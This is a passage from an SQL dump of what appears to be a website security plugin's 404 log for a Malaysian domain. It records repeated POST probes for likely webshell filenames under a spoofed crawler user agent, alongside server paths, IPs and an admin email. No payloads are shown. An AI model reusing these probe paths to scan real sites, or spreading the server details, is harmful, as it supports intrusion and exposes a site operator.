Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"122.186.144.248\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"122.186.144.248\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/pic/jingyiao.ASp\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/pic/jingyiao.ASp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-SQK6CYj3S7An3VFFqwQAAAUE\";s:12:\"REDIRECT_URL\";s:17:\"/pic/jingyiao.ASp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"55544\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/pic/jingyiao.ASp\";s:10:\"SCRIPT_URL\";s:17:\"/pic/jingyiao.ASp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-SQK6CYj3S7An3VFFqwQAAAUE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571803712.9552\";s:12:\"REQUEST_TIME\";s:10:\"1571803712\";}}','notice','2019-10-23 04:08:36','2019-10-23 04:08:33',35269696,37068976,'http://bintara.com.my//pic/jingyiao.ASp',1,0,'122.186.144.248'),(28787,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//Down/jszx/he.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"819\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"121.36.204.125\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"121.36.204.125\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/Down/jszx/he.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/Down/jszx/he.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-SSa6CYj3S7An3VFFqxgAAAVc\";s:12:\"REDIRECT_URL\";s:17:\"/Down/jszx/he.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"55544\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/Down/jszx/he.asp\";s:10:\"SCRIPT_URL\";s:17:\"/Down/jszx/he.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-SSa6CYj3S7An3VFFqxgAAAVc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571803721.6778\";s:12:\"REQUEST_TIME\";s:10:\"1571803721\";}}','notice','2019-10-23 04:08:44','2019-10-23 04:08:42',35338912,37144168,'http://bintara.com.my//Down/jszx/he.asp',1,0,'121.36.204.125'),(28788,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//Down/jszx/he.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"61.243.220.136\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"61.243.220.136\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/Down/jszx/he.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/Down/jszx/he.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-SUK6CYj3S7An3VFFqyQAAAVI\";s:12:\"REDIRECT_URL\";s:17:\"/Down/jszx/he.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"55544\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/Down/jszx/he.asp\";s:10:\"SCRIPT_URL\";s:17:\"/Down/jszx/he.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-SUK6CYj3S7An3VFFqyQAAAVI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571803728.8258\";s:12:\"REQUEST_TIME\";s:10:\"1571803728\";}}','notice','2019-10-23 04:08:51','2019-10-23 04:08:49',35272728,37067576,'http://bintara.com.my//Down/jszx/he.asp',1,0,'61.243.220.136'),(28789,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//upload/123asp.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"818\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"211.139.4.164\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"211.139.4.164\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/upload/123asp.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/upload/123asp.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-SWK6CYj3S7An3VFFqzgAAAUs\";s:12:\"REDIRECT_URL\";s:18:\"/upload/123asp.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"55544\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/upload/123asp.asp\";s:10:\"SCRIPT_URL\";s:18:\"/upload/123asp.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-SWK6CYj3S7An3VFFqzgAAAUs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571803736.9495\";s:12:\"REQUEST_TIME\";s:10:\"1571803736\";}}','notice','2019-10-23 04:08:59','2019-10-23 04:08:57',35342032,37146760,'http://bintara.com.my//upload/123asp.asp',1,0,'211.139.4.164'),(28790,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//UserFiles/x.aspx\";s:14:\"CONTENT_LENGTH\";s:3:\"819\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"117.79.150.6\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"117.79.150.6\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/UserFiles/x.aspx\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/UserFiles/x.aspx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-SauHARMCuuKQiJT-8tAAAAM0\";s:12:\"REDIRECT_URL\";s:17:\"/UserFiles/x.aspx\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"56575\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/UserFiles/x.aspx\";s:10:\"SCRIPT_URL\";s:17:\"/UserFiles/x.aspx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-SauHARMCuuKQiJT-8tAAAAM0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571803754.6386\";s:12:\"REQUEST_TIME\";s:10:\"1571803754\";}}','notice','2019-10-23 04:09:16','2019-10-23 04:09:15',35343264,37141384,'http://bintara.com.my//UserFiles/x.aspx',1,0,'117.79.150.6'),(28791,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//UserFiles/x.aspx\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"121.46.179.87\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"121.46.179.87\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/UserFiles/x.aspx\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/UserFiles/x.aspx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-Sc66CYj3S7An3VFFq2gAAAVg\";s:12:\"REDIRECT_URL\";s:17:\"/UserFiles/x.aspx\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"57055\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/UserFiles/x.aspx\";s:10:\"SCRIPT_URL\";s:17:\"/UserFiles/x.aspx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-Sc66CYj3S7An3VFFq2gAAAVg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571803763.8062\";s:12:\"REQUEST_TIME\";s:10:\"1571803763\";}}','notice','2019-10-23 04:09:26','2019-10-23 04:09:24',35272232,37075408,'http://bintara.com.my//UserFiles/x.aspx',1,0,'121.46.179.87'),(28792,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//css/weijiao.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"685\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"221.239.192.104\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"221.239.192.104\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/css/weijiao.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/css/weijiao.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-Sf9aMiBShLW1lPtcTAwAAABQ\";s:12:\"REDIRECT_URL\";s:16:\"/css/weijiao.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"57422\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/css/weijiao.asp\";s:10:\"SCRIPT_URL\";s:16:\"/css/weijiao.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-Sf9aMiBShLW1lPtcTAwAAABQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571803775.6576\";s:12:\"REQUEST_TIME\";s:10:\"1571803775\";}}','notice','2019-10-23 04:09:38','2019-10-23 04:09:36',35269640,37086008,'http://bintara.com.my//css/weijiao.asp',1,0,'221.239.192.104'),(28793,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//images/index.php\";s:14:\"CONTENT_LENGTH\";s:3:\"299\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"118.126.113.45\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"118.126.113.45\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/images/index.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/images/index.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-ShtaMiBShLW1lPtcTBgAAABY\";s:12:\"REDIRECT_URL\";s:17:\"/images/index.php\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"57422\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/images/index.php\";s:10:\"SCRIPT_URL\";s:17:\"/images/index.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-ShtaMiBShLW1lPtcTBgAAABY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571803783.0196\";s:12:\"REQUEST_TIME\";s:10:\"1571803783\";}}','notice','2019-10-23 04:09:44','2019-10-23 04:09:43',35270104,37078056,'http://bintara.com.my//images/index.php',1,0,'118.126.113.45'),(28794,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"//inc/AspCms_AdvJs.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"222.240.165.132\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"222.240.165.132\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/inc/AspCms_AdvJs.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/inc/AspCms_AdvJs.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-SmNaMiBShLW1lPtcTDQAAAAk\";s:12:\"REDIRECT_URL\";s:21:\"/inc/AspCms_AdvJs.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"57422\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/inc/AspCms_AdvJs.asp\";s:10:\"SCRIPT_URL\";s:21:\"/inc/AspCms_AdvJs.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-SmNaMiBShLW1lPtcTDQAAAAk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571803800.7774\";s:12:\"REQUEST_TIME\";s:10:\"1571803800\";}}','notice','2019-10-23 04:10:06','2019-10-23 04:10:01',35344320,37146304,'http://bintara.com.my//inc/AspCms_AdvJs.asp',1,0,'222.240.165.132'),(28795,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"//inc/AspCms_AdvJs.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; 